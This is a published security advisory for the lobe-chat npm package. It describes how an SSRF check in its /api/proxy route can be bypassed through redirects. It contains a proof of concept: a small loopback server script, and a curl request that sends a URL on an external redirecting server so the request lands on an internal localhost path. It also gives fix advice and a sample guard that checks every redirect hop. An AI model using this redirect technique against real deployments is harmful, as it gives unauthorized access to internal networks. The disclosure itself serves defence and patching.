Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS0zZmM4LTJyM2YtOHdyZ84AA_um

lobe-chat implemented an insufficient fix for GHSA-mxhq-xw3g-rphc (CVE-2024-32964)

Summary

The SSRF protection implemented in https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts does not consider redirects and can be bypassed when an attacker supplies an external malicious URL that redirects to internal resources such as a private network or a loopback address.

PoC

  1. Run lobe-chat in a Docker container. In my setup lobe-chat runs on 0.0.0.0:3210;

  2. Create a file dummy-server.js with the following content:

const http = require('http');
console.log("running server");
// Minimal HTTP server bound to the loopback interface only; it logs every
// request path it receives so a proxied request from lobe-chat is visible.
http.createServer(function (req, res) {
  console.log(req.url);
  res.writeHead(200, {'Content-Type': 'text/html'});
  res.end();
}).listen(3001, 'localhost');

And run

node dummy-server.js

as an example server inside container [1] (or in the container's private network).

  3. Run the following in a terminal to send a request to the lobe-chat instance from [1]:

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: 0.0.0.0:3210' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://0.0.0.0:3210/settings/agent?agent=&session=inbox&tab=' -H $'Content-Type: text/plain;charset=UTF-8' -H $'Content-Length: 74' -H $'Origin: http://0.0.0.0:3210' -H $'Connection: keep-alive' -H $'Priority: u=0' \
    -b $'LOBE_LOCALE=en-EN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined' \
    --data-binary $'http://130.193.49.129:8090/redirect?url=http://localhost:3001/iamssrf_1337' \
    $'http://0.0.0.0:3210/api/proxy'

where the body contains the URL of a server that redirects to the internal network (in my case it redirects according to the url parameter).

  4. Observe in the output of [2]:

running server
/iamssrf_1337

  5. The attacker is able to perform SSRF attacks against lobe-chat despite the https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts#L26 check.

Fix recommendations:

  1. Disable redirects: lobe-chat should consider explicitly disabling redirects.
  2. If redirect support is required, perform the check before each HTTP request.
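One way to implement the second recommendation, as an added example that is not lobe-chat's own code: redirects are followed manually (`redirect: 'manual'`) so that the destination check runs before every hop rather than only on the URL the client submitted. The names `isInternalHost`, `checkUrl` and `safeFetch`, the injectable `fetchImpl` and Node 18+ globals are assumptions; DNS names are not resolved in this snippet.

```javascript
// Added example, not lobe-chat's own code: an SSRF guard that validates the
// destination on every hop of a redirect chain, not only the submitted URL.
// Assumes Node 18+ (global URL and fetch).

// True for loopback, private, link-local, unspecified and other non-global
// literals. DNS names are not resolved here; a production guard must resolve
// them and check the resolved address (and pin it for the actual connection).
function isInternalHost(hostname) {
  const h = hostname.replace(/^\[|\]$/g, '').toLowerCase();
  if (h === 'localhost' || h.endsWith('.localhost')) return true;
  // IPv6 literal: allow only global unicast (2000::/3); this conservatively
  // blocks ::1, ::, fe80::/10, fc00::/7 and IPv4-mapped ::ffff:a.b.c.d.
  if (h.includes(':')) return !/^[23][0-9a-f]{3}:/.test(h);
  // WHATWG URL already normalises hex/octal/short IPv4 forms to dotted decimal.
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(h);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) || (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168);
}

// Returns a rejection reason, or null when the URL may be fetched.
function checkUrl(urlString) {
  let u;
  try { u = new URL(urlString); } catch { return 'unparseable URL'; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return 'scheme not allowed';
  if (isInternalHost(u.hostname)) return 'internal address';
  return null;
}

// Follows redirects manually so that checkUrl() runs before every request,
// which is fix recommendation 2 above. fetchImpl is injectable (defaults to
// global fetch) so the loop can be exercised offline with a stub.
async function safeFetch(urlString, { fetchImpl = fetch, maxRedirects = 5 } = {}) {
  let current = urlString;
  for (let hop = 0; hop <= maxRedirects; hop++) {
    const reason = checkUrl(current);
    if (reason) throw new Error(`blocked ${current}: ${reason}`);
    const res = await fetchImpl(current, { redirect: 'manual' });
    if (![301, 302, 303, 307, 308].includes(res.status)) return res;
    const location = res.headers.get('location');
    if (!location) return res;
    current = new URL(location, current).href; // Location may be relative
  }
  throw new Error('too many redirects');
}
```

Parsing with the WHATWG URL class before the check matters because it canonicalises alternative IPv4 spellings, so a single dotted-decimal comparison covers them.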

Impact

https://portswigger.net/web-security/ssrf

Permalink: https://github.com/advisories/GHSA-3fc8-2r3f-8wrg
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZmM4LTJyM2YtOHdyZ84AA_um
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 28 days ago
Updated: 21 days ago


CVSS Score: 9.0
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H

Identifiers: GHSA-3fc8-2r3f-8wrg, CVE-2024-47066
References: Repository: https://github.com/lobehub/lobe-chat
Blast Radius: 1.0

Affected Packages

npm:@lobehub/chat
Dependent packages: 0
Dependent repositories: 0
Downloads: 31,120 last month
Affected Version Ranges: <= 1.19.12
Fixed in: 1.19.13
All affected versions: 0.1.6 through 1.19.12 (see Affected Version Ranges)
All unaffected versions: 1.19.13, 1.19.14, 1.19.15, 1.19.16, 1.19.17, 1.19.18, 1.19.19, 1.19.20, 1.19.21, 1.19.22, 1.19.23, 1.19.24, 1.19.25, 1.19.26, 1.19.27, 1.19.28, 1.19.29, 1.19.30, 1.19.31, 1.19.32, 1.19.33, 1.19.34, 1.19.35, 1.19.36, 1.20.0, 1.20.1, 1.20.2, 1.20.3, 1.20.4, 1.20.5, 1.20.6, 1.20.7, 1.20.8, 1.21.0, 1.21.1, 1.21.2, 1.21.3, 1.21.4, 1.21.5, 1.21.6, 1.21.7, 1.21.8, 1.21.9, 1.21.10, 1.21.11, 1.21.12, 1.21.13, 1.21.14, 1.21.15, 1.21.16, 1.22.0, 1.22.1, 1.22.2, 1.22.3, 1.22.4, 1.22.5, 1.22.6, 1.22.7, 1.22.8, 1.22.9, 1.22.10